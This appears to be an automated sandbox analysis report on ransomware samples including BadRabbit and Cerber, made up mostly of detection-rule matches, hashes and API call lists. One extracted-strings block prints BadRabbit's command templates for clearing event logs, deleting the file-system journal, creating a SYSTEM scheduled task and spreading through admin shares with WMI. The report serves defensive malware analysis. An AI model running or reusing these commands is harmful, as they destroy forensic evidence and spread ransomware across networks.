Source: 10.2.Endermanch@BadRabbit.exe.dc6458.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 49.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 19.2.Endermanch@Cerber5.exe.1720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 32.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 4.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 1.2.Endermanch@BadRabbit.exe.140f570.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 40.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 19.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 49.2.Endermanch@BadRabbit.exe.1586018.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 3.3.rundll32.exe.4c2ba0.1.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 19.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 32.2.Endermanch@BadRabbit.exe.1036698.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 58.2.Endermanch@Cerber5.exe.4de0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 3.2.rundll32.exe.4c2ba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 10.2.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 1.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 1.2.Endermanch@BadRabbit.exe.140f570.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 27.0.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE	Matched rule: Auto-generated rule Author: Florian Roth
Source: 1.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 19.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 4.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 19.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 3.2.rundll32.exe.4c2ba0.0.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 3.2.rundll32.exe.444ff8.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 3.2.rundll32.exe.444ff8.1.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 10.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 47.2.rundll32.exe.5c4e70.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 47.2.rundll32.exe.5c4e70.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 40.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 3.3.rundll32.exe.4c2ba0.0.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 3.3.rundll32.exe.4c2ba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 49.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 58.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 3.3.rundll32.exe.4c2ba0.2.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 58.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 58.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 32.2.Endermanch@BadRabbit.exe.1036698.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 40.2.Endermanch@Cerber5.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 3.3.rundll32.exe.4c2ba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 27.2.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE	Matched rule: Auto-generated rule Author: Florian Roth
Source: 9.2.rundll32.exe.6b5050.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 9.2.rundll32.exe.6b5050.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 32.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 32.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 1.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 49.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 10.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 19.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 4.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 47.2.rundll32.exe.4200000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 47.2.rundll32.exe.4200000.1.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 58.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 3.2.rundll32.exe.7b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 3.2.rundll32.exe.7b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 9.2.rundll32.exe.4220000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 9.2.rundll32.exe.4220000.1.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 27.0.5753.tmp.7ff7cef20000.1.unpack, type: UNPACKEDPE	Matched rule: Auto-generated rule Author: Florian Roth
Source: 49.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 1.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 4.2.Endermanch@BadRabbit.exe.1426458.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 40.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 3.3.rundll32.exe.4c2ba0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 40.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 19.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 58.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 9.2.rundll32.exe.6b5050.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 9.2.rundll32.exe.6b5050.0.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 47.2.rundll32.exe.5c4e70.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 47.2.rundll32.exe.5c4e70.0.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
Source: 3.2.rundll32.exe.444ff8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: 00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Bad Rabbit Ransomware Author: Christiaan Beek
Source: 0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: 00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Cerber3 Author: pekeinfo
Source: 00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Cerber Payload Author: kevoreilly
Source: Process Memory Space: rundll32.exe PID: 5364, type: MEMORYSTR	Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, type: DROPPED	Matched rule: Detects InfinityLock ransomware Author: ditekSHen
Source: C:\Windows\cscc.dat, type: DROPPED	Matched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, type: DROPPED	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: C:\Windows\dispci.exe, type: DROPPED	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: C:\Windows\dispci.exe, type: DROPPED	Matched rule: Bad Rabbit Ransomware Author: Christiaan Beek
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, type: DROPPED	Matched rule: Cerber3 Author: pekeinfo
Source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Contains functionality to create processes via WMI

Source: rundll32.exe, 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp

Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32

Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Code function: 1_2_0132173C	1_2_0132173C
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Code function: 1_2_013230E3	1_2_013230E3
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Code function: 1_2_0132201D	1_2_0132201D
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Code function: 1_2_01323840	1_2_01323840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BA83C	3_2_007BA83C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BC940	3_2_007BC940
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BB11D	3_2_007BB11D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B2708	3_2_007B2708
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007BC1E3	3_2_007BC1E3
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B6A0	19_2_0040B6A0
Source: C:\Windows\5753.tmp	Code function: 27_2_00007FF7CEF25C00	27_2_00007FF7CEF25C00
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B6A0	40_2_0040B6A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,

3_2_007B9B63

Source: C:\Windows\System32\svchost.exe

Section loaded: xboxlivetitleid.dll

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe 630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,

3_2_007B9534

Source: irH9zMhZub.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 32.2.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 49.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 40.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 10.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.0.5753.tmp.7ff7cef20000.2.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 27.0.5753.tmp.7ff7cef20000.2.unpack, type: UNPACKEDPE	Matched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 4.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 40.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
Source: 32.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 58.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
Source: 10.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.Endermanch@BadRabbit.exe.1426458.1.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.Endermanch@BadRabbit.exe.dc6458.0.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 49.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.Endermanch@Cerber5.exe.1720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
